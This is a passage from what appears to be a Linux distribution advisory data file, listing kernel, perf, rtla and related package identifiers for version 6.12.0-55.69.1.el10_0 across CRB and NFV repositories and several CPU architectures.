"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
